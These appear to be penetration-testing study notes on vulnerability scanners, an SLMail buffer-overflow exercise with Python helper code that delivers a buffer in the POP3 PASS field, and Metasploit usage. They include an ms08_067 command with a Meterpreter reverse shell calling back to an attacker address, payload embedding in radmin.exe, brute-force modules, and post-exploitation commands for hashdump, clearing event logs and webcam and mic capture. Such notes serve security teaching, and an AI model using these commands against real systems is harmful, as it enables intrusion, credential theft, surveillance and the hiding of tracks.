Vulnerability scanning
- Look up known exploits: searchsploit tomcat (the right-hand column is the path to the exploit file and its usage notes, relative to the exploitdb directory)
- Install the OpenVAS vulnerability scanner:
Download and install the package: apt-get install openvas
Initial setup (creates the admin user and syncs the feeds): openvas-setup
(on newer Kali releases the package and setup tool are named gvm and gvm-setup instead)
- Install Nessus:
http://www.tenable.com/products/nessus/select-your-operating-system
• Install: dpkg -i (followed by the downloaded .deb package)
• Install path: /opt/nessus
• Start the service: /etc/init.d/nessusd start
• Management UI: https://127.0.0.1:8834
• Register an activation code: http://www.tenable.com/products/nessus-home
- Install NEXPOSE (commercial and expensive: several hundred thousand yuan per year)
Windows buffer overflow
- Fuzzer (the exercise only works against old, unprotected builds such as XP and Windows Server 2003)
- • SLMail 5.5.0 Mail Server
- • ImmunityDebugger_1_85_setup.exe
- • mona.py
Shellcode attack: shellcode is machine code written out as hex bytes. Once the overflow has overwritten the EIP register, a block of shellcode that the CPU will execute is placed in the buffer, for example one that opens an nc connection back to the attacker. The shellcode must avoid any byte values the target mangles (bad characters), and the overwritten EIP must point at an instruction that transfers control into it. Shellcode for the vulnerable software is obtained, a remote exploit that delivers it is written in C or Python, and a successful run yields root (on Windows, SYSTEM) privileges on the target machine.
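The bookkeeping half of the workflow above (a cyclic pattern for the fuzzer, mapping the EIP value seen in the debugger back to an offset, a bad-character test string, and the final buffer layout), as an added example written for this page rather than code from the original notes. The offset, return address and shellcode it uses are placeholders chosen for illustration, not values measured on any real target; the only target-specific assumption is that the buffer is delivered in the POP3 PASS field, which is the field the well-known SLMail 5.5.0 exercise goes through.

```python
# Added example for these notes, not code from the original page.
# Offset, return address and shellcode values are placeholders.
import socket
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is
    unique, so the value that lands in EIP pinpoints its offset."""
    chunks, total = [], 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("pattern limited to 20280 bytes")


def pattern_offset(eip_hex: str, length: int = 20280) -> int:
    """Map the EIP value shown by the debugger (e.g. '39694438') back to
    its byte offset in the pattern. x86 is little-endian, so the register
    value is packed with '<I' before searching."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError(f"EIP {eip_hex} is not from this pattern")
    return idx


def badchar_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte value except the ones already known to be bad. Send it
    after the EIP overwrite and compare memory in the debugger: the first
    byte that differs is the next bad character to add to `exclude`."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def contains_badchars(data: bytes, badchars: bytes) -> bytes:
    """Return the bad bytes present in `data` (empty means it is clean)."""
    return bytes(sorted(set(data) & set(badchars)))


def build_buffer(offset: int, ret_addr: int, shellcode: bytes,
                 total_len: int, badchars: bytes = b"\x00",
                 nop_sled: int = 16) -> bytes:
    """junk | return address (e.g. a JMP ESP) | NOP sled | shellcode | pad.
    Refuses shellcode containing a bad character, since the target would
    silently truncate or corrupt it."""
    bad = contains_badchars(shellcode, badchars)
    if bad:
        raise ValueError(f"shellcode contains bad chars: {bad.hex()}")
    buf = b"A" * offset + struct.pack("<I", ret_addr)
    buf += b"\x90" * nop_sled + shellcode
    if len(buf) > total_len:
        raise ValueError("payload does not fit in the crash length")
    return buf + b"C" * (total_len - len(buf))


def send_pop3_pass(host: str, port: int, payload: bytes,
                   user: str = "test", timeout: float = 5.0) -> bytes:
    """Deliver a buffer in the PASS command of a POP3 conversation.
    Lab use only; the self-test below never calls it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(b"USER " + user.encode() + b"\r\n")
        s.recv(1024)
        s.sendall(b"PASS " + payload + b"\r\n")
        return banner


if __name__ == "__main__":
    # Illustrative: a debugger showing EIP=39694438 after a pattern was sent
    # means the overwrite begins at offset 2606 of that pattern.
    off = pattern_offset("39694438")
    placeholder_shellcode = b"\xcc" * 32   # INT3 bytes, not real shellcode
    buf = build_buffer(off, 0x42424242, placeholder_shellcode, 3000)
    print(off, len(buf))
```

Fuzz first by sending `cyclic_pattern(n)` for growing n until the service crashes, read EIP from the debugger, and feed it to `pattern_offset`; then loop `badchar_string` against the debugger's memory view until the list is complete, and only then generate shellcode with that bad-character list and assemble the buffer with `build_buffer`.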
MSF (Metasploit Framework):
- Start: msfconsole -q; msfdb start; db_status; db_connect -h (help). The module tree lives under /usr/share/metasploit-framework/modules/
- Basic usage:
- db_nmap 192.168.0.115; hosts; hosts 192.168.0.115
- db_disconnect / db_connect
- db_import /root/nmap.xml
- db_export -f xml /root/bak.xml
- Using the mysql_login module:
- Enter the module: 1. search mysql_login, 2. use auxiliary/scanner/mysql/mysql_login, 3. show options
- Run the module: 1. set USERNAME root, 2. set BLANK_PASSWORDS yes, 3. set RHOSTS 192.168.1.22, 4. show options, 5. run, 6. db_export -f xml /root/msfbak.xml, 7. back
- Console commands, for example:
- set / unset / setg / unsetg / save
- run / exploit
- jobs / kill 0
- load / unload / loadpath
- sessions -l / sessions -i <id> (shell, Meterpreter and VNC sessions)
- route: send traffic for a subnet through an existing session (pivoting)
- irb (e.g. Framework::Version)
- resource (msfconsole -r a.rc)
- Generating a payload:
- 1. use payload/windows/shell_bind_tcp
- generate / generate -b '\x00' (emits the raw payload bytes; -b excludes bad characters)
- Generate an executable: generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe (five rounds of shikata_ga_nai encoding, injected into radmin.exe as a template; -k keeps the template's original functionality). This is the pre-Metasploit-5 syntax, where -t is the output format and -f the output file; current versions use -f for the format and -o for the output file, the same flags msfvenom takes.
- Meterpreter: controlling the reverse shell
- Basic commands, by area:
- • session: help, background, run, bgrun, resource, migrate, shell, execute -f cmd.exe -i -H (interactive cmd.exe with a hidden window)
- • file system: cd, ls, dir, cat, pwd, mkdir, mv, rm, rmdir, edit, search -f autoexec.bat, show_mount, lpwd, lcd (attacker side), download, upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
- • privileges and credentials: getuid, getsystem, getprivs, getpid, hashdump, run post/windows/gather/hashdump
- • system: sysinfo, ps, kill, idletime, reboot, shutdown, clearev (clear the event logs)
- • network: arp, netstat, ipconfig, ifconfig, route, getproxy
- • surveillance: record_mic, webcam_list, webcam_snap -i 1 -v false
- msfcli was removed from the framework in June 2015; msfconsole -x replaces it:
- ▪ msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit"
- Auxiliary scanner modules
- search arp; use auxiliary/scanner/discovery/arp_sweep
- search portscan; use auxiliary/scanner/portscan/syn
- search udp_sweep / udp_probe; use auxiliary/scanner/discovery/udp_sweep
- use auxiliary/scanner/ssh/ssh_version
- use auxiliary/scanner/ssh/ssh_login; set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt; set VERBOSE false; run (password brute force)
- use auxiliary/scanner/ssh/juniper_backdoor (device backdoor check)
- use auxiliary/scanner/ssh/ssh_login_pubkey; set KEY_FILE id_rsa; set USERNAME root; run (public-key login)
- use auxiliary/scanner/mssql/mssql_ping (locate MSSQL instances)
- use auxiliary/scanner/mssql/mssql_login (brute-force MSSQL logins)
- use auxiliary/admin/mssql/mssql_exec (remote command execution through xp_cmdshell)
- use auxiliary/scanner/vnc/vnc_login (password brute force)
- use auxiliary/scanner/vnc/vnc_none_auth (reports "supported : None, free access!" when the server requires no authentication)
- use auxiliary/scanner/rdp/ms12_020_check (Remote Desktop MS12-020 vulnerability check)
- use auxiliary/scanner/smb/smb_version
- use auxiliary/scanner/smb/pipe_auditor (enumerate accessible named pipes)
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
- use auxiliary/scanner/smb/smb_enumshares
- use auxiliary/scanner/smb/smb_enumusers
- use auxiliary/scanner/smb/smb_lookupsid (enumerate users through SID lookups)
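The auxiliary scanners above are normally run one at a time with set RHOSTS; the database workflow (db_import of an nmap XML file) gives a faster way to drive them. As an added example, written for this page and not code from the original notes or from the Metasploit project, the script below reads the same nmap XML that db_import consumes and emits a resource script (for msfconsole -r) that runs only the scanners matching services nmap actually found open. The service-to-module table and the embedded sample scan are my own constructions; the addresses come from the 192.0.2.0/24 documentation range.

```python
# Added example for these notes, not code from the original page or from
# Metasploit.  SERVICE_MODULES and SAMPLE_NMAP_XML are constructed here.
import xml.etree.ElementTree as ET

# nmap service name (as printed in its port table) -> auxiliary modules to run
SERVICE_MODULES = {
    "ssh":           ["auxiliary/scanner/ssh/ssh_version"],
    "ms-sql-s":      ["auxiliary/scanner/mssql/mssql_ping"],
    "vnc":           ["auxiliary/scanner/vnc/vnc_none_auth"],
    "ms-wbt-server": ["auxiliary/scanner/rdp/ms12_020_check"],
    "microsoft-ds":  ["auxiliary/scanner/smb/smb_version",
                      "auxiliary/scanner/smb/smb_enumshares",
                      "auxiliary/scanner/smb/smb_enumusers"],
    "netbios-ssn":   ["auxiliary/scanner/smb/smb_version"],
}

# Constructed sample in nmap's -oX layout (declaration and extra attributes
# that nmap emits are omitted; the parser only needs the elements used here).
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/29">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
      <port protocol="tcp" portid="5900"><state state="open"/><service name="vnc"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> dict:
    """Return {service_name: [ip, ...]} for ports nmap reports as open on
    hosts that are up.  Filtered/closed ports and down hosts are skipped so
    no scanner run (or noise on the wire) is spent on them."""
    targets = {}
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            service = port.find("service")
            if state is None or state.get("state") != "open" or service is None:
                continue
            targets.setdefault(service.get("name"), []).append(ip)
    return targets


def build_resource_script(targets: dict, threads: int = 10) -> str:
    """Emit msfconsole commands: one use / set RHOSTS / run / back block per
    module, covering every host that exposes the matching service.
    Services with no mapping (http, smtp, ...) are left out, not guessed."""
    lines = ["setg VERBOSE false", f"setg THREADS {threads}"]
    for service, modules in SERVICE_MODULES.items():
        hosts = sorted(set(targets.get(service, [])))
        if not hosts:
            continue
        for module in modules:
            lines += [f"use {module}",
                      f"set RHOSTS {' '.join(hosts)}",
                      "run",
                      "back"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Save the output as scan.rc and run it with: msfconsole -q -r scan.rc
    print(build_resource_script(parse_nmap_xml(SAMPLE_NMAP_XML)), end="")
```

The filtered 3389 on the first host is deliberately dropped: ms12_020_check against a port that never answered only wastes time, and keeping the "open" filter is what makes the generated script safe to run unattended. Because the modules are still driven through msfconsole, the results land in the same database that db_nmap and db_import populate, so hosts and services remain available afterwards.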